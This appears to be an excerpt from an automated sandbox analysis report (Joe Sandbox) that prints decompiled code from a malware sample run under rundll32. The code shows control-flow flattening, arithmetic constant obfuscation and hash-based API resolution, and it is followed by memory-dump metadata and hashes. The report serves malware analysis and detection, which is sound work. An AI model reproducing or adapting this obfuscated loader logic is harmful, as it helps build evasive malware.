                                                                                                                      				_v404 = _v404 ^ 0x01a57735;
                                                                                                                      				_v356 = 0xfabb05;
                                                                                                                      				_v356 = _v356 | 0x8af6c05e;
                                                                                                                      				_v356 = _v356 ^ 0x8af1d93b;
                                                                                                                      				_v380 = 0x2efe0b;
                                                                                                                      				_v380 = _v380 | 0x60ccafe9;
                                                                                                                      				_v380 = _v380 >> 2;
                                                                                                                      				_v380 = _v380 ^ 0x183e3099;
                                                                                                                      				_v348 = 0x4aabda;
                                                                                                                      				_v348 = _v348 ^ 0x6d9ddbef;
                                                                                                                      				_v348 = _v348 ^ 0x6dd36298;
                                                                                                                      				_v388 = 0x49b388;
                                                                                                                      				_v388 = _v388 | 0xfd8f470c;
                                                                                                                      				_v388 = _v388 << 0xa;
                                                                                                                      				_v388 = _v388 ^ 0x3fdfba02;
                                                                                                                      				_v472 = 0xbd7846;
                                                                                                                      				_v472 = _v472 + 0xffff85c8;
                                                                                                                      				_v472 = _v472 >> 0xd;
                                                                                                                      				_v472 = _v472 >> 0xc;
                                                                                                                      				_v472 = _v472 ^ 0x00060807;
                                                                                                                      				_v456 = 0xd92e51;
                                                                                                                      				_t714 = 0x17;
                                                                                                                      				_v456 = _v456 / _t714;
                                                                                                                      				_v456 = _v456 >> 0xd;
                                                                                                                      				_v456 = _v456 + 0xffff8d85;
                                                                                                                      				_v456 = _v456 ^ 0xfffee4a4;
                                                                                                                      				_v340 = 0x27bb27;
                                                                                                                      				_v340 = _v340 | 0xb25f39d4;
                                                                                                                      				_v340 = _v340 ^ 0xb27a85e4;
                                                                                                                      				_v464 = 0x5d8dc9;
                                                                                                                      				_v464 = _v464 + 0x522d;
                                                                                                                      				_v464 = _v464 << 1;
                                                                                                                      				_t623 = 0xb;
                                                                                                                      				_v464 = _v464 / _t623;
                                                                                                                      				_v464 = _v464 ^ 0x0017bd02;
                                                                                                                      				_v364 = 0xb86d20;
                                                                                                                      				_v364 = _v364 + 0x9843;
                                                                                                                      				_v364 = _v364 ^ 0x00bb00fc;
                                                                                                                      				_v480 = 0x632eda;
                                                                                                                      				_v480 = _v480 + 0xffff6eee;
                                                                                                                      				_v480 = _v480 + 0xffff8324;
                                                                                                                      				_v480 = _v480 + 0x3513;
                                                                                                                      				_v480 = _v480 ^ 0x006160eb;
                                                                                                                      				_v412 = 0xc84084;
                                                                                                                      				_t715 = 0x19;
                                                                                                                      				_t729 = _v312;
                                                                                                                      				_t624 = _v312;
                                                                                                                      				_v412 = _v412 / _t715;
                                                                                                                      				_v412 = _v412 | 0x26b33a0b;
                                                                                                                      				_v412 = _v412 ^ 0x26bcb4da;
                                                                                                                      				_v420 = 0x8ac001;
                                                                                                                      				_v420 = _v420 << 0xf;
                                                                                                                      				_v420 = _v420 ^ 0xe10d88e3;
                                                                                                                      				_v420 = _v420 ^ 0x810a258e;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					while(1) {
                                                                                                                      						_t686 = 0x14e2fae;
                                                                                                                      						do {
                                                                                                                      							while(1) {
                                                                                                                      								L3:
                                                                                                                      								_t736 = _t723 - 0x6872271;
                                                                                                                      								if(_t736 <= 0) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								__eflags = _t723 - 0x6af60a9;
                                                                                                                      								if(_t723 == 0x6af60a9) {
                                                                                                                      									_push(0x4000);
                                                                                                                      									_push(0x4000);
                                                                                                                      									_t574 = E002C3512(0x4000);
                                                                                                                      									_v536 = _t574;
                                                                                                                      									__eflags = _t574;
                                                                                                                      									if(__eflags == 0) {
                                                                                                                      										_t633 = _v488;
                                                                                                                      										_t723 = 0x3b379fe;
                                                                                                                      										_t686 = 0x14e2fae;
                                                                                                                      										goto L31;
                                                                                                                      									}
                                                                                                                      									_t723 = 0x2b997a9;
                                                                                                                      									L13:
                                                                                                                      									_t633 = _v488;
                                                                                                                      									_t686 = 0x14e2fae;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      								__eflags = _t723 - 0x6fc00ac;
                                                                                                                      								if(_t723 == 0x6fc00ac) {
                                                                                                                      									_t724 =  &_v256;
                                                                                                                      									_t687 = E002BEF71(8, 0x10);
                                                                                                                      									_t578 = _v520;
                                                                                                                      									__eflags = _t578 - _t687;
                                                                                                                      									if(_t578 < _t687) {
                                                                                                                      										_t689 = _t687 - _t578;
                                                                                                                      										_t719 = _t724;
                                                                                                                      										_t654 = _t689 >> 1;
                                                                                                                      										__eflags = _t654;
                                                                                                                      										_t621 = memset(_t719, 0x2d002d, _t654 << 2);
                                                                                                                      										asm("adc ecx, ecx");
                                                                                                                      										_t724 = _t724 + _t689 * 2;
                                                                                                                      										memset(_t719 + _t654, _t621, 0);
                                                                                                                      										_t730 =  &(_t730[6]);
                                                                                                                      									}
                                                                                                                      									_push(E002BEF71(8, 0x10));
                                                                                                                      									_push(_v436);
                                                                                                                      									_push(_t724);
                                                                                                                      									_t636 = 0xb;
                                                                                                                      									E002B5A07(_t636, _v428);
                                                                                                                      									_t730 =  &(_t730[5]);
                                                                                                                      									_t723 = 0x6af60a9;
                                                                                                                      									L12:
                                                                                                                      									_t583 = _v536;
                                                                                                                      									goto L13;
                                                                                                                      								}
                                                                                                                      								__eflags = _t723 - 0xa6d69a8;
                                                                                                                      								if(_t723 == 0xa6d69a8) {
                                                                                                                      									_t722 = E002BEF71(1, 8);
                                                                                                                      									_push(_t722);
                                                                                                                      									_push(_v328);
                                                                                                                      									_push( &_v288);
                                                                                                                      									_t637 = 9;
                                                                                                                      									E002B5A07(_t637, _v336);
                                                                                                                      									_t730 =  &(_t730[5]);
                                                                                                                      									_t723 = 0xb1820f0;
                                                                                                                      									goto L12;
                                                                                                                      								}
                                                                                                                      								__eflags = _t723 - 0xb1820f0;
                                                                                                                      								if(_t723 == 0xb1820f0) {
                                                                                                                      									_t722 = E002BEF71(4, 0x10);
                                                                                                                      									_push(_t722);
                                                                                                                      									_push(_v452);
                                                                                                                      									_push( &_v128);
                                                                                                                      									_t638 = 0xb;
                                                                                                                      									E002B5A07(_t638, _v500);
                                                                                                                      									_t730 =  &(_t730[5]);
                                                                                                                      									_t723 = 0x6fc00ac;
                                                                                                                      									goto L12;
                                                                                                                      								}
                                                                                                                      								__eflags = _t723 - 0xff9e75d;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									goto L31;
                                                                                                                      								}
                                                                                                                      								_t723 = 0xa6d69a8;
                                                                                                                      							}
                                                                                                                      							if(_t736 == 0) {
                                                                                                                      								E002CFD29( *_t633, _v416, _t624, _v400,  *((intOrPtr*)(_t633 + 4)));
                                                                                                                      								_t488 =  &_v488; // 0x6160eb
                                                                                                                      								_t633 =  *_t488;
                                                                                                                      								_t730 =  &(_t730[3]);
                                                                                                                      								_t723 = 0x605d68b;
                                                                                                                      								_t624 = _t624 +  *((intOrPtr*)(_t633 + 4));
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      							if(_t723 == _t686) {
                                                                                                                      								_push(0x2b141c);
                                                                                                                      								_push(_v360);
                                                                                                                      								_v308 = _t722 + _t729;
                                                                                                                      								_t624 = E002BF545( &_v128, __eflags, _v508, _t722 + _t729 - _t729,  &_v256, _v324,  &_v288, _v392, E002BBB4B(_v408, _v440, __eflags), _v432) + _t729;
                                                                                                                      								E002BAE03(_v424, _v332, _v352, _t595);
                                                                                                                      								_t730 =  &(_t730[0xc]);
                                                                                                                      								_t723 = 0x6872271;
                                                                                                                      								goto L12;
                                                                                                                      							}
                                                                                                                      							if(_t723 == 0x2109cc3) {
                                                                                                                      								_t722 = _t722 +  *((intOrPtr*)(_t633 + 4));
                                                                                                                      								_push(_t633);
                                                                                                                      								_push(_t633);
                                                                                                                      								_t729 = E002C3512(_t722);
                                                                                                                      								_t583 = _v536;
                                                                                                                      								__eflags = _t729;
                                                                                                                      								_t633 = _v488;
                                                                                                                      								_t686 = 0x14e2fae;
                                                                                                                      								_t723 =  !=  ? 0x14e2fae : 0x6704547;
                                                                                                                      								goto L3;
                                                                                                                      							}
                                                                                                                      							if(_t723 == 0x2b997a9) {
                                                                                                                      								_push(_v492);
                                                                                                                      								_push(_v368);
                                                                                                                      								_push(0x2b13bc);
                                                                                                                      								_t604 = E002BAB66(_v376, _v448, __eflags);
                                                                                                                      								_push( &_v256);
                                                                                                                      								_push(_t604);
                                                                                                                      								_push(_t722);
                                                                                                                      								_push(_v536);
                                                                                                                      								 *((intOrPtr*)(E002BC1DC(_v376, 0xbf7d08b0, 0xef)))();
                                                                                                                      								E002BAE03(_v460, _v316, _v524, _t604);
                                                                                                                      								_t730 =  &(_t730[9]);
                                                                                                                      								_t723 = 0x2109cc3;
                                                                                                                      								goto L12;
                                                                                                                      							}
                                                                                                                      							if(_t723 == 0x605d68b) {
                                                                                                                      								_push(0x2b138c);
                                                                                                                      								_push(_v356);
                                                                                                                      								_t614 = E002BF060(E002BBB4B(_v396, _v404, __eflags), __eflags, _v348, _t624, _v308 - _t624, _v388,  &_v256, _v472);
                                                                                                                      								E002BAE03(_v456, _v340, _v464, _t610);
                                                                                                                      								_t616 = _v312;
                                                                                                                      								_t628 = _t624 + _t614 - _t729;
                                                                                                                      								__eflags = _t628;
                                                                                                                      								 *_t616 = _t729;
                                                                                                                      								 *(_t616 + 4) = _t628;
                                                                                                                      								L34:
                                                                                                                      								return _v536;
                                                                                                                      							}
                                                                                                                      							if(_t723 != 0x6704547) {
                                                                                                                      								goto L31;
                                                                                                                      							}
                                                                                                                      							E002B68DE(_v364, _v480, _v412, _v420, _t583);
                                                                                                                      							return 0;
                                                                                                                      							L31:
                                                                                                                      							__eflags = _t723 - 0x3b379fe;
                                                                                                                      						} while (__eflags != 0);
                                                                                                                      						goto L34;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}










































































































                                                                                                                      0x002c706d
                                                                                                                      0x002c7075
                                                                                                                      0x002c707d
                                                                                                                      0x002c7085
                                                                                                                      0x002c7097
                                                                                                                      0x002c70a1
                                                                                                                      0x002c70a8
                                                                                                                      0x002c70af
                                                                                                                      0x002c70b6
                                                                                                                      0x002c70c1
                                                                                                                      0x002c70cc
                                                                                                                      0x002c70d7
                                                                                                                      0x002c70df
                                                                                                                      0x002c70ea
                                                                                                                      0x002c70f5
                                                                                                                      0x002c70f5
                                                                                                                      0x002c70f9
                                                                                                                      0x002c70f9
                                                                                                                      0x002c70fe
                                                                                                                      0x002c70fe
                                                                                                                      0x002c70fe
                                                                                                                      0x002c70fe
                                                                                                                      0x002c7104
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c72d3
                                                                                                                      0x002c72d9
                                                                                                                      0x002c7418
                                                                                                                      0x002c7419
                                                                                                                      0x002c741a
                                                                                                                      0x002c741f
                                                                                                                      0x002c7425
                                                                                                                      0x002c7427
                                                                                                                      0x002c7433
                                                                                                                      0x002c7437
                                                                                                                      0x002c743c
                                                                                                                      0x00000000
                                                                                                                      0x002c743c
                                                                                                                      0x002c7429
                                                                                                                      0x002c71d4
                                                                                                                      0x002c71d4
                                                                                                                      0x002c70f9
                                                                                                                      0x00000000
                                                                                                                      0x002c70f9
                                                                                                                      0x002c72df
                                                                                                                      0x002c72e5
                                                                                                                      0x002c7390
                                                                                                                      0x002c73a7
                                                                                                                      0x002c73a9
                                                                                                                      0x002c73af
                                                                                                                      0x002c73b1
                                                                                                                      0x002c73b3
                                                                                                                      0x002c73b5
                                                                                                                      0x002c73be
                                                                                                                      0x002c73be
                                                                                                                      0x002c73c0
                                                                                                                      0x002c73c2
                                                                                                                      0x002c73c4
                                                                                                                      0x002c73c7
                                                                                                                      0x002c73c7
                                                                                                                      0x002c73c7
                                                                                                                      0x002c73dd
                                                                                                                      0x002c73de
                                                                                                                      0x002c73ec
                                                                                                                      0x002c73ef
                                                                                                                      0x002c73f0
                                                                                                                      0x002c73f5
                                                                                                                      0x002c73f8
                                                                                                                      0x002c71d0
                                                                                                                      0x002c71d0
                                                                                                                      0x00000000
                                                                                                                      0x002c71d0
                                                                                                                      0x002c72eb
                                                                                                                      0x002c72f1
                                                                                                                      0x002c735e
                                                                                                                      0x002c7367
                                                                                                                      0x002c7368
                                                                                                                      0x002c7376
                                                                                                                      0x002c7379
                                                                                                                      0x002c737a
                                                                                                                      0x002c737f
                                                                                                                      0x002c7382
                                                                                                                      0x00000000
                                                                                                                      0x002c7382
                                                                                                                      0x002c72f3
                                                                                                                      0x002c72f9
                                                                                                                      0x002c7325
                                                                                                                      0x002c732e
                                                                                                                      0x002c732f
                                                                                                                      0x002c7337
                                                                                                                      0x002c733a
                                                                                                                      0x002c733b
                                                                                                                      0x002c7340
                                                                                                                      0x002c7343
                                                                                                                      0x00000000
                                                                                                                      0x002c7343
                                                                                                                      0x002c72fb
                                                                                                                      0x002c7301
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c7307
                                                                                                                      0x002c7307
                                                                                                                      0x002c710a
                                                                                                                      0x002c72ba
                                                                                                                      0x002c72bf
                                                                                                                      0x002c72bf
                                                                                                                      0x002c72c3
                                                                                                                      0x002c72c6
                                                                                                                      0x002c72cb
                                                                                                                      0x00000000
                                                                                                                      0x002c72cb
                                                                                                                      0x002c7112
                                                                                                                      0x002c7218
                                                                                                                      0x002c721d
                                                                                                                      0x002c7232
                                                                                                                      0x002c7291
                                                                                                                      0x002c7294
                                                                                                                      0x002c7299
                                                                                                                      0x002c729c
                                                                                                                      0x00000000
                                                                                                                      0x002c729c
                                                                                                                      0x002c711e
                                                                                                                      0x002c71e1
                                                                                                                      0x002c71ef
                                                                                                                      0x002c71f0
                                                                                                                      0x002c71f8
                                                                                                                      0x002c71ff
                                                                                                                      0x002c7203
                                                                                                                      0x002c7207
                                                                                                                      0x002c720b
                                                                                                                      0x002c7210
                                                                                                                      0x00000000
                                                                                                                      0x002c7210
                                                                                                                      0x002c712a
                                                                                                                      0x002c716d
                                                                                                                      0x002c7171
                                                                                                                      0x002c7183
                                                                                                                      0x002c7188
                                                                                                                      0x002c719e
                                                                                                                      0x002c71a3
                                                                                                                      0x002c71a4
                                                                                                                      0x002c71a5
                                                                                                                      0x002c71b1
                                                                                                                      0x002c71c3
                                                                                                                      0x002c71c8
                                                                                                                      0x002c71cb
                                                                                                                      0x00000000
                                                                                                                      0x002c71cb
                                                                                                                      0x002c7132
                                                                                                                      0x002c744f
                                                                                                                      0x002c7454
                                                                                                                      0x002c749e
                                                                                                                      0x002c74b8
                                                                                                                      0x002c74bd
                                                                                                                      0x002c74c7
                                                                                                                      0x002c74c7
                                                                                                                      0x002c74c9
                                                                                                                      0x002c74cb
                                                                                                                      0x002c74ce
                                                                                                                      0x00000000
                                                                                                                      0x002c74ce
                                                                                                                      0x002c713e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c715e
                                                                                                                      0x00000000
                                                                                                                      0x002c7441
                                                                                                                      0x002c7441
                                                                                                                      0x002c7441
                                                                                                                      0x00000000
                                                                                                                      0x002c744d
                                                                                                                      0x002c70f9

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $^Z$'xUx$(q$)E1$)w@$-R$:|$>,b$\,j$\f%$izV$`a$x
                                                                                                                      • API String ID: 0-215870970
                                                                                                                      • Opcode ID: dcfec40ea3b488f8d46bda75af3d579dd230ac055006aa8d9c6b4e54d0bdc6b7
                                                                                                                      • Instruction ID: c673eae873ca70fde24243191267066649c5fca64c97938ae790f5cd772ef2d3
                                                                                                                      • Opcode Fuzzy Hash: dcfec40ea3b488f8d46bda75af3d579dd230ac055006aa8d9c6b4e54d0bdc6b7
                                                                                                                      • Instruction Fuzzy Hash: E05221725083819FD374CF25C98AB8BBBE1BBC4358F108A1DE5DA96260D7B18859CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E002B2FA1(void* __ecx) {
                                                                                                                      				char _v524;
                                                                                                                      				char _v1044;
                                                                                                                      				char _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				intOrPtr _v1572;
                                                                                                                      				intOrPtr _v1576;
                                                                                                                      				intOrPtr _v1588;
                                                                                                                      				char _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				signed int _v1708;
                                                                                                                      				signed int _v1712;
                                                                                                                      				signed int _v1716;
                                                                                                                      				signed int _v1720;
                                                                                                                      				signed int _v1724;
                                                                                                                      				signed int _v1728;
                                                                                                                      				signed int _v1732;
                                                                                                                      				signed int _v1736;
                                                                                                                      				signed int _v1740;
                                                                                                                      				signed int _v1744;
                                                                                                                      				signed int _v1748;
                                                                                                                      				signed int _v1752;
                                                                                                                      				signed int _v1756;
                                                                                                                      				signed int _v1760;
                                                                                                                      				signed int _v1764;
                                                                                                                      				signed int _v1768;
                                                                                                                      				signed int _v1772;
                                                                                                                      				signed int _v1776;
                                                                                                                      				signed int _v1780;
                                                                                                                      				signed int _v1784;
                                                                                                                      				signed int _v1788;
                                                                                                                      				signed int _v1792;
                                                                                                                      				signed int _v1796;
                                                                                                                      				signed int _v1800;
                                                                                                                      				signed int _v1804;
                                                                                                                      				signed int _v1808;
                                                                                                                      				signed int _v1812;
                                                                                                                      				signed int _v1816;
                                                                                                                      				signed int _v1820;
                                                                                                                      				signed int _v1824;
                                                                                                                      				signed int _v1828;
                                                                                                                      				signed int _v1832;
                                                                                                                      				void* _t602;
                                                                                                                      				void* _t605;
                                                                                                                      				void* _t612;
                                                                                                                      				void* _t615;
                                                                                                                      				void* _t627;
                                                                                                                      				void* _t629;
                                                                                                                      				signed int _t631;
                                                                                                                      				signed int _t632;
                                                                                                                      				signed int _t633;
                                                                                                                      				signed int _t634;
                                                                                                                      				signed int _t635;
                                                                                                                      				signed int _t636;
                                                                                                                      				signed int _t637;
                                                                                                                      				signed int _t638;
                                                                                                                      				signed int _t639;
                                                                                                                      				signed int _t640;
                                                                                                                      				signed int _t641;
                                                                                                                      				signed int _t642;
                                                                                                                      				signed int _t643;
                                                                                                                      				signed int _t644;
                                                                                                                      				signed int _t645;
                                                                                                                      				signed int _t646;
                                                                                                                      				void* _t647;
                                                                                                                      				signed int _t650;
                                                                                                                      				signed int _t696;
                                                                                                                      				signed int _t706;
                                                                                                                      				void* _t708;
                                                                                                                      				void* _t713;
                                                                                                                      				void* _t714;
                                                                                                                      
                                                                                                                      				_v1568 = _v1568 & 0x00000000;
                                                                                                                      				_v1596 = _v1596 & 0x00000000;
                                                                                                                      				_v1576 = 0x5e97ec;
                                                                                                                      				_v1572 = 0x72e58f;
                                                                                                                      				_v1768 = 0x70cb3c;
                                                                                                                      				_v1768 = _v1768 + 0xffffc098;
                                                                                                                      				_v1768 = _v1768 >> 0xd;
                                                                                                                      				_v1768 = _v1768 ^ 0x02000384;
                                                                                                                      				_v1820 = 0xee4d2b;
                                                                                                                      				_t15 =  &_v1820; // 0xee4d2b
                                                                                                                      				_t629 = __ecx;
                                                                                                                      				_t708 = 0x23fa72;
                                                                                                                      				_t631 = 0x3b;
                                                                                                                      				_v1820 =  *_t15 / _t631;
                                                                                                                      				_t632 = 0x76;
                                                                                                                      				_v1820 = _v1820 * 0x22;
                                                                                                                      				_v1820 = _v1820 + 0xffff6a70;
                                                                                                                      				_v1820 = _v1820 ^ 0x0087d8ad;
                                                                                                                      				_v1744 = 0x47ad5e;
                                                                                                                      				_v1744 = _v1744 + 0xffff8cd4;
                                                                                                                      				_v1744 = _v1744 * 0x70;
                                                                                                                      				_v1744 = _v1744 ^ 0x1f2feb3a;
                                                                                                                      				_v1628 = 0xf34c5;
                                                                                                                      				_v1628 = _v1628 + 0x5841;
                                                                                                                      				_v1628 = _v1628 ^ 0x0009a1de;
                                                                                                                      				_v1812 = 0x9823b5;
                                                                                                                      				_v1812 = _v1812 ^ 0xd7f45b6c;
                                                                                                                      				_v1812 = _v1812 / _t632;
                                                                                                                      				_v1812 = _v1812 ^ 0x01df5c7b;
                                                                                                                      				_v1812 = _v1812 ^ 0x000f259a;
                                                                                                                      				_v1608 = 0x734624;
                                                                                                                      				_v1608 = _v1608 >> 0xe;
                                                                                                                      				_v1608 = _v1608 ^ 0x000c01bf;
                                                                                                                      				_v1804 = 0xceac9b;
                                                                                                                      				_v1804 = _v1804 << 0x10;
                                                                                                                      				_t633 = 0x3d;
                                                                                                                      				_v1804 = _v1804 / _t633;
                                                                                                                      				_v1804 = _v1804 + 0x655b;
                                                                                                                      				_v1804 = _v1804 ^ 0x02dbc44e;
                                                                                                                      				_v1736 = 0x9be166;
                                                                                                                      				_v1736 = _v1736 >> 5;
                                                                                                                      				_v1736 = _v1736 ^ 0xd09875ee;
                                                                                                                      				_v1736 = _v1736 ^ 0xd0950b72;
                                                                                                                      				_v1824 = 0xc35391;
                                                                                                                      				_v1824 = _v1824 >> 3;
                                                                                                                      				_v1824 = _v1824 >> 0x10;
                                                                                                                      				_v1824 = _v1824 * 3;
                                                                                                                      				_v1824 = _v1824 ^ 0x00036b47;
                                                                                                                      				_v1800 = 0x15c07f;
                                                                                                                      				_v1800 = _v1800 << 9;
                                                                                                                      				_v1800 = _v1800 >> 4;
                                                                                                                      				_v1800 = _v1800 | 0x1ec023ab;
                                                                                                                      				_v1800 = _v1800 ^ 0x1effac55;
                                                                                                                      				_v1668 = 0x9ff678;
                                                                                                                      				_v1668 = _v1668 >> 6;
                                                                                                                      				_v1668 = _v1668 ^ 0x00061642;
                                                                                                                      				_v1676 = 0x388031;
                                                                                                                      				_v1676 = _v1676 + 0xa9e3;
                                                                                                                      				_v1676 = _v1676 ^ 0x003372a3;
                                                                                                                      				_v1700 = 0x68320b;
                                                                                                                      				_v1700 = _v1700 >> 9;
                                                                                                                      				_v1700 = _v1700 * 0x58;
                                                                                                                      				_v1700 = _v1700 ^ 0x00127519;
                                                                                                                      				_v1728 = 0x8bcc69;
                                                                                                                      				_v1728 = _v1728 + 0xffffee5b;
                                                                                                                      				_v1728 = _v1728 >> 0xf;
                                                                                                                      				_v1728 = _v1728 ^ 0x000f8317;
                                                                                                                      				_v1620 = 0xdd5dd2;
                                                                                                                      				_v1620 = _v1620 + 0xffff3cca;
                                                                                                                      				_v1620 = _v1620 ^ 0x00d1dad8;
                                                                                                                      				_v1756 = 0x5b77fe;
                                                                                                                      				_v1756 = _v1756 >> 0x10;
                                                                                                                      				_v1756 = _v1756 + 0xcf07;
                                                                                                                      				_v1756 = _v1756 ^ 0x0002651f;
                                                                                                                      				_v1600 = 0xe5338f;
                                                                                                                      				_v1600 = _v1600 >> 2;
                                                                                                                      				_v1600 = _v1600 ^ 0x0038d695;
                                                                                                                      				_v1748 = 0x539c61;
                                                                                                                      				_v1748 = _v1748 >> 4;
                                                                                                                      				_v1748 = _v1748 ^ 0x7ee23abc;
                                                                                                                      				_v1748 = _v1748 ^ 0x7eed6078;
                                                                                                                      				_v1660 = 0x8a8a87;
                                                                                                                      				_v1660 = _v1660 + 0xb3eb;
                                                                                                                      				_v1660 = _v1660 ^ 0x0081b7ad;
                                                                                                                      				_v1716 = 0x7622c2;
                                                                                                                      				_v1716 = _v1716 ^ 0x68bb0f30;
                                                                                                                      				_v1716 = _v1716 ^ 0x34de6465;
                                                                                                                      				_v1716 = _v1716 ^ 0x5c136dbb;
                                                                                                                      				_v1684 = 0xf6dfed;
                                                                                                                      				_v1684 = _v1684 << 0xb;
                                                                                                                      				_v1684 = _v1684 | 0x3f4bdd8f;
                                                                                                                      				_v1684 = _v1684 ^ 0xbff0253f;
                                                                                                                      				_v1816 = 0xe04e35;
                                                                                                                      				_v1816 = _v1816 >> 2;
                                                                                                                      				_v1816 = _v1816 + 0x327b;
                                                                                                                      				_v1816 = _v1816 + 0x911b;
                                                                                                                      				_v1816 = _v1816 ^ 0x003e79db;
                                                                                                                      				_v1612 = 0xd6f31e;
                                                                                                                      				_v1612 = _v1612 | 0x3022205e;
                                                                                                                      				_v1612 = _v1612 ^ 0x30f4c89e;
                                                                                                                      				_v1784 = 0xaf77e7;
                                                                                                                      				_t634 = 0x4a;
                                                                                                                      				_v1784 = _v1784 / _t634;
                                                                                                                      				_v1784 = _v1784 | 0x421bf711;
                                                                                                                      				_t635 = 0x50;
                                                                                                                      				_v1784 = _v1784 * 0x54;
                                                                                                                      				_v1784 = _v1784 ^ 0xb12f1f5b;
                                                                                                                      				_v1652 = 0xf84d37;
                                                                                                                      				_v1652 = _v1652 * 0x24;
                                                                                                                      				_v1652 = _v1652 ^ 0x22e540eb;
                                                                                                                      				_v1792 = 0xffdc51;
                                                                                                                      				_v1792 = _v1792 << 0xa;
                                                                                                                      				_v1792 = _v1792 | 0xe1b7830e;
                                                                                                                      				_v1792 = _v1792 + 0xffff0b40;
                                                                                                                      				_v1792 = _v1792 ^ 0xfffcd716;
                                                                                                                      				_v1740 = 0x197a11;
                                                                                                                      				_v1740 = _v1740 << 5;
                                                                                                                      				_v1740 = _v1740 / _t635;
                                                                                                                      				_v1740 = _v1740 ^ 0x00038a69;
                                                                                                                      				_v1644 = 0x6b00f0;
                                                                                                                      				_v1644 = _v1644 << 0xa;
                                                                                                                      				_v1644 = _v1644 ^ 0xac018c07;
                                                                                                                      				_v1604 = 0x611781;
                                                                                                                      				_v1604 = _v1604 << 0xf;
                                                                                                                      				_v1604 = _v1604 ^ 0x8bc919f5;
                                                                                                                      				_v1808 = 0xd36465;
                                                                                                                      				_t636 = 6;
                                                                                                                      				_v1808 = _v1808 * 0x36;
                                                                                                                      				_v1808 = _v1808 / _t636;
                                                                                                                      				_v1808 = _v1808 << 1;
                                                                                                                      				_v1808 = _v1808 ^ 0x0edf69e5;
                                                                                                                      				_v1832 = 0x3f9dc0;
                                                                                                                      				_v1832 = _v1832 + 0xffff18c0;
                                                                                                                      				_v1832 = _v1832 ^ 0x4a717db2;
                                                                                                                      				_v1832 = _v1832 << 8;
                                                                                                                      				_v1832 = _v1832 ^ 0x4fcf9c5e;
                                                                                                                      				_v1732 = 0x9e099a;
                                                                                                                      				_v1732 = _v1732 ^ 0xff857814;
                                                                                                                      				_v1732 = _v1732 + 0xffffca1f;
                                                                                                                      				_v1732 = _v1732 ^ 0xff111531;
                                                                                                                      				_v1776 = 0x4db87;
                                                                                                                      				_v1776 = _v1776 + 0xffff62f5;
                                                                                                                      				_v1776 = _v1776 ^ 0x44009895;
                                                                                                                      				_v1776 = _v1776 << 2;
                                                                                                                      				_v1776 = _v1776 ^ 0x101849e4;
                                                                                                                      				_v1708 = 0xd244cf;
                                                                                                                      				_v1708 = _v1708 >> 9;
                                                                                                                      				_t637 = 0x3a;
                                                                                                                      				_v1708 = _v1708 * 0x11;
                                                                                                                      				_v1708 = _v1708 ^ 0x000db4cc;
                                                                                                                      				_v1636 = 0xf59e87;
                                                                                                                      				_v1636 = _v1636 + 0xffff8d09;
                                                                                                                      				_v1636 = _v1636 ^ 0x00f1a368;
                                                                                                                      				_v1724 = 0x2bdcc8;
                                                                                                                      				_v1724 = _v1724 * 0x51;
                                                                                                                      				_v1724 = _v1724 * 0x5d;
                                                                                                                      				_v1724 = _v1724 ^ 0x0aa2c27a;
                                                                                                                      				_v1828 = 0x689116;
                                                                                                                      				_v1828 = _v1828 + 0xfffffd09;
                                                                                                                      				_v1828 = _v1828 / _t637;
                                                                                                                      				_t638 = 0x67;
                                                                                                                      				_v1828 = _v1828 / _t638;
                                                                                                                      				_v1828 = _v1828 ^ 0x000cd418;
                                                                                                                      				_v1692 = 0xa047a9;
                                                                                                                      				_v1692 = _v1692 << 6;
                                                                                                                      				_v1692 = _v1692 >> 3;
                                                                                                                      				_v1692 = _v1692 ^ 0x0505fbf3;
                                                                                                                      				_v1616 = 0xb6eb58;
                                                                                                                      				_v1616 = _v1616 ^ 0x8fb73430;
                                                                                                                      				_v1616 = _v1616 ^ 0x8f037651;
                                                                                                                      				_v1752 = 0x713cbb;
                                                                                                                      				_t639 = 0x59;
                                                                                                                      				_v1752 = _v1752 / _t639;
                                                                                                                      				_v1752 = _v1752 | 0x24e66ff7;
                                                                                                                      				_v1752 = _v1752 ^ 0x24e68565;
                                                                                                                      				_v1760 = 0x2ce68a;
                                                                                                                      				_v1760 = _v1760 + 0xf472;
                                                                                                                      				_v1760 = _v1760 >> 6;
